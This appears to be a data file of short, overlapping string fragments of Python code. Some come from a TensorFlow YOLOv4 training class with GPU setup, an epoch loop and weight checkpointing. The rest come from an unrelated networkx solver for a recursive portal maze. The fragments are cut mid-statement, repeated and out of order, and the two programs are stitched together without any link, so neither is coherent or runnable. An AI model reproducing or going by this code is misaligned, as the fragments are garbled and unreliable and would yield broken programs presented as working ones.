net.summary() global fine_tune_epoch # 是否finetune", "tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): #", "fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train", "self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch +", "metric.reset_states() if epoch % save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path +", "tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency == 0: net.save_weights(filepath=weights_path", "============================================= # -*- coding: utf-8 -*- # @Time : 2020/5/14 上午10:50 # @Author", "gpus: logging.info(\"use gpu device\") # gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu)", "out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables))", "self.data_generator() # 网络结构 net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune:", "设置评价指标 metric = self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs):", "range(fine_tune_epoch + 1, train_epochs): step = 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch)", "metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size),", "{}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() ))", "epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency", "= tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self):", "cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count = self.data_generator()", "# @Time : 2020/5/14 上午10:50 # @Author : xiao9616 # @Email : <EMAIL>", "loss = self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标 metric = self.metric_generator()", "+ 1, train_epochs): step = 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step", "cpu\") else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset,", "enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found gpu device,convert to use cpu\")", "train_dataset: # print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images)", "# 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() # 模型训练与更新 for", "= self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs): step =", "============================================ import logging import tensorflow as tf import os from src.yolo4.config import *", "src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\",", "tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\") # gpu显存分配", "<EMAIL> # @File : BaseModel.py # @Software: PyCharm # ============================================ import logging import", "%H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象", "step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states()", "os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count = self.data_generator() # 网络结构 net =", "device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count = self.data_generator() #" ]
[ "0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level != 0 and acc_outer:", "import networkx as nx import sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines):", "0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level:", "{} for portal_id in portal_list.keys(): if portal_id == 'AA': continue for portal_pos in", "- 1) if lines[row - 1][col] == '.' else (col, row + 2))", "= nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x, y): return", "= direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part", "for pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world,", "portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer", "pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level", "y == height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {},", "level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None) paths = [path", "- 1) def is_outer(x, y): return x == 2 or y == 2", "not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col +", "= nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id", "1][col]].append((col, row - 1) if lines[row - 1][col] == '.' else (col, row", "else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and", "else (col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row +", "in enumerate(line): if obj != '.': continue if line[col - 1] == '.':", "= [path for path in paths if path] return min(paths) if paths else", "in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha(): continue if line[col +", "path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0", "if level > 0 and acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions)", "== 2 or x == width - 4 or y == height -", "pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = []", "def is_outer(x, y): return x == 2 or y == 2 or x", "pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos)", "assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines = f.readlines()", "from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for row,line in", "= dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos):", "- 4 or y == height - 3 def accessible_portals(pos, portal_list, world): acc_outer,", "for row,line in enumerate(lines): for col,obj in enumerate(line): if obj != '.': continue", "W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0])", "return acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found = search_paths(acc_outer, -1) if", "+ 1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row) if line[col +", "portal_list.values(): if len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with", "continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else", "min(solutions) if solutions else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections,", "None) paths = [path for path in paths if path] return min(paths) if", "current_pos): return [pos for pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos,", "[(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch: pos, level, path_length = to_check_branch.pop()", "+ 2] == '.' else (col - 1, row)) elif lines[row + 1][col].isalpha():", "direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W, portal_connections, 100)", "= get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions", "'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos == pos: continue try: dst", "row - 1)) return world def search_portals(lines): portals = defaultdict(list) for row,line in", "[pos for pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list,", "portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals) == 1: continue assert len(portals)", "portals[obj + line[col + 1]].append((col + 2, row) if line[col + 2] ==", "> 0 and acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions) if solutions", "0)] solutions = [] while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner", "if portal_id == 'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos == pos:", "== width - 4 or y == height - 3 def accessible_portals(pos, portal_list,", "'.': world.add_edge((col, row), (col - 1, row)) if lines[row - 1][col] == '.':", "len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines = f.readlines() width", "new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)]", "level - 1, path_length) return min(solutions) if solutions else None W = direct_paths(lines)", "== 2 or y == 2 or x == width - 4 or", "'.': world.add_edge((col, row), (col, row - 1)) return world def search_portals(lines): portals =", "dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else acc_inner assert", "- 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for portal_id", "- 1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row", "is_outer(x, y): return x == 2 or y == 2 or x ==", "2)) return portals def portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals) ==", "+ 1]].append((col + 2, row) if line[col + 2] == '.' else (col", "get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in portal_list[portal_id] if pos != current_pos][0]", "world): for portals in portal_list.values(): if len(portals) == 1: continue assert len(portals) ==", "continue if line[col - 1] == '.': world.add_edge((col, row), (col - 1, row))", "portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not", "acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions) if solutions else None W", "for pid in accessible.keys() if pid != 'ZZ']: current = accessible[pid] new_length =", "or (pid, dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level", "height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for", "nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos", "in portal_list.keys(): if portal_id == 'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos", "nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line): if obj != '.':", "distance_to_goal else None) paths = [path for path in paths if path] return", "portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x, y): return x == 2", "for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha(): continue if", "search_paths(accessible, dlevel): paths = [] for pid, dst_pos in accessible.items(): if pid ==", "= defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha():", "line[col - 1] == '.': world.add_edge((col, row), (col - 1, row)) if lines[row", "world.add_edge((col, row), (col, row - 1)) return world def search_portals(lines): portals = defaultdict(list)", "if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col", "and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found", "accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level) in history: continue distance_to_goal", "'ZZ']: current = accessible[pid] new_length = current_length + 1 + current[0] new_pos =", "def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length): for pid in [pid for", "for col,obj in enumerate(line): if obj != '.': continue if line[col - 1]", "portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths = [] for pid, dst_pos", "new_level, current_length): for pid in [pid for pid in accessible.keys() if pid !=", "acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level +", "!= '.': continue if line[col - 1] == '.': world.add_edge((col, row), (col -", "nx import sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph()", "'.' else (col, row + 2)) return portals def portal_paths(portal_list, world): for portals", "world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None)", "networkx as nx import sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world", "enumerate(line): if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col +", "line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row) if line[col", "elif level >= max_level: continue add_branches(acc_inner, level + 1, path_length) if level >", "if is_outer(*portal_pos) else acc_inner assert portal_id not in accessible accessible[portal_id] = dst, portal_pos", "paths = [] for pid, dst_pos in accessible.items(): if pid == 'ZZ' or", "return world def search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj", "row), (col - 1, row)) if lines[row - 1][col] == '.': world.add_edge((col, row),", "path in paths if path] return min(paths) if paths else None acc_outer, acc_inner", "search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level):", "col,obj in enumerate(line): if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj +", "acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level + 1, path_length) if", "in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world,", "level == 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level != 0", "1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length): for pid in [pid", "+ line[col + 1]].append((col + 2, row) if line[col + 2] == '.'", "2, row) if line[col + 2] == '.' else (col - 1, row))", "= to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and", "continue if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row)", "in acc_outer: return acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found = search_paths(acc_outer,", "dlevel): paths = [] for pid, dst_pos in accessible.items(): if pid == 'ZZ'", "continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1],", "portals[obj + lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col] ==", "else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result", "if paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level ==", "0, 0)] solutions = [] while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer,", "+ dst_pos[0] + 1 if distance_to_goal else None) paths = [path for path", "row + 2)) return portals def portal_paths(portal_list, world): for portals in portal_list.values(): if", "'ZZ' or (pid, dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]),", "paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None) paths = [path for", "'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner,", "return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length):", "== 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines = f.readlines() width =", "in portal_list[portal_id]: if portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos)", "search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1)", "continue for portal_pos in portal_list[portal_id]: if portal_pos == pos: continue try: dst =", "(col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col,", "solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level + 1,", "in portal_list.values(): if len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1])", "obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col + 2,", "x == 2 or y == 2 or x == width - 4", "one', len(path) - 1) def is_outer(x, y): return x == 2 or y", "= len(lines[0]) height = len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W)", "= search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) -", "if line[col + 2] == '.' else (col - 1, row)) elif lines[row", "height = len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path =", "accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length +", "+ dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if", "min(paths) if paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level", "1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row -", "pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0]", "acc_inner assert portal_id not in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass", "len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as", "portal_id, current_pos): return [pos for pos in portal_list[portal_id] if pos != current_pos][0] def", "pid in accessible.keys() if pid != 'ZZ']: current = accessible[pid] new_length = current_length", "1)) return world def search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for", "!= 0 and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found return", "x == width - 4 or y == height - 3 def accessible_portals(pos,", "if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible,", "in accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level) in history: continue", "solutions = [] while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner =", "pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths = [] for", "for col,obj in enumerate(line): if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj", "pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history):", "row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha(): continue if line[col", "dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None) paths =", "continue add_branches(acc_inner, level + 1, path_length) if level > 0 and acc_outer: add_branches(acc_outer,", "pid == 'ZZ' or (pid, dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list,", "-1) if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def", "obj != '.': continue if line[col - 1] == '.': world.add_edge((col, row), (col", "1) def is_outer(x, y): return x == 2 or y == 2 or", "get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions =", "history): print(level) def search_paths(accessible, dlevel): paths = [] for pid, dst_pos in accessible.items():", "or x == width - 4 or y == height - 3 def", "= accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer: return", "acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found:", "1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row) if line[col + 2]", "current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0,", "!= current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths", "'.': continue if line[col - 1] == '.': world.add_edge((col, row), (col - 1,", "f: lines = f.readlines() width = len(lines[0]) height = len(lines) W = direct_paths(lines)", "pid, dst_pos in accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level) in", "new_length = current_length + 1 + current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos,", "portal_list, world): acc_outer, acc_inner = {}, {} for portal_id in portal_list.keys(): if portal_id", "is_outer(*portal_pos) else acc_inner assert portal_id not in accessible accessible[portal_id] = dst, portal_pos except", "while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world)", "== height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {}", "1, row)) if lines[row - 1][col] == '.': world.add_edge((col, row), (col, row -", "= pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal", "1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col]", "if portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible =", "level > 0 and acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions) if", "+ acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level + 1, path_length)", "portals in portal_list.values(): if len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0],", "current_length): for pid in [pid for pid in accessible.keys() if pid != 'ZZ']:", "portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def", "+ 1 if distance_to_goal else None) paths = [path for path in paths", "lines[row - 1][col] == '.' else (col, row + 2)) return portals def", "in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def", "row)) if lines[row - 1][col] == '.': world.add_edge((col, row), (col, row - 1))", "1]].append((col + 2, row) if line[col + 2] == '.' else (col -", "acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in portal_list[portal_id] if pos", "not in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner", "try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else acc_inner", "== '.': world.add_edge((col, row), (col - 1, row)) if lines[row - 1][col] ==", "accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id,", "row) if line[col + 2] == '.' else (col - 1, row)) elif", "- 1][col] == '.': world.add_edge((col, row), (col, row - 1)) return world def", "as f: lines = f.readlines() width = len(lines[0]) height = len(lines) W =", "for pid in [pid for pid in accessible.keys() if pid != 'ZZ']: current", "= accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length", "== 0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >=", "defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha(): continue", "accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0]", "= [(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch: pos, level, path_length =", "def search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line):", "return [pos for pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level,", "== 'ZZ' or (pid, dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid,", "def portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals) == 1: continue assert", "add_branches(acc_outer, level - 1, path_length) return min(solutions) if solutions else None W =", "level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths = [] for pid,", "== 'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos == pos: continue try:", "defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines): for col,obj", "nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x, y): return x", "if lines[row - 1][col] == '.': world.add_edge((col, row), (col, row - 1)) return", "world = nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line): if obj", "= pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W, portal_connections, 100) print('part two',", "portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos", "1 if distance_to_goal else None) paths = [path for path in paths if", "print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level + 1, path_length) if level", "= direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W, portal_connections,", "1, path_length) if level > 0 and acc_outer: add_branches(acc_outer, level - 1, path_length)", "def direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line):", "lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col] == '.' else", "if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row) if", "portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else", "2 or y == 2 or x == width - 4 or y", "if distance_to_goal else None) paths = [path for path in paths if path]", "for portals in portal_list.values(): if len(portals) == 1: continue assert len(portals) == 2", "for path in paths if path] return min(paths) if paths else None acc_outer,", "def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths = []", "0 and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner,", "elif lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row - 1) if", "== '.': world.add_edge((col, row), (col, row - 1)) return world def search_portals(lines): portals", "= accessible[pid] new_length = current_length + 1 + current[0] new_pos = get_other_exit(portal_list, pid,", "in enumerate(line): if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col", "new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch: pos,", "for pid, dst_pos in accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level)", "def search_paths(accessible, dlevel): paths = [] for pid, dst_pos in accessible.items(): if pid", "pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal +", "== '.' else (col, row + 2)) return portals def portal_paths(portal_list, world): for", "add_branches(acc_inner, level + 1, path_length) if level > 0 and acc_outer: add_branches(acc_outer, level", "acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer:", "else (col, row + 2)) return portals def portal_paths(portal_list, world): for portals in", "2 or x == width - 4 or y == height - 3", "as nx import sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world =", "= acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id not in accessible accessible[portal_id] =", "if lines[row - 1][col] == '.' else (col, row + 2)) return portals", "if len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt')", "'.' else (col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row", "world def search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in", "portal_list, world) if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0])", "+ 1 + current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch", "import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines): for", "{}, {} for portal_id in portal_list.keys(): if portal_id == 'AA': continue for portal_pos", "and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue", "(col - 1, row)) if lines[row - 1][col] == '.': world.add_edge((col, row), (col,", "accessible.keys() if pid != 'ZZ']: current = accessible[pid] new_length = current_length + 1", "width = len(lines[0]) height = len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections,", "solutions else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set())", "= nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line): if obj !=", "dst_pos in accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level) in history:", "or y == 2 or x == width - 4 or y ==", "None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result =", "continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines =", "current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = [] while", "1] == '.': world.add_edge((col, row), (col - 1, row)) if lines[row - 1][col]", "= {}, {} for portal_id in portal_list.keys(): if portal_id == 'AA': continue for", "path_length) if level > 0 and acc_outer: add_branches(acc_outer, level - 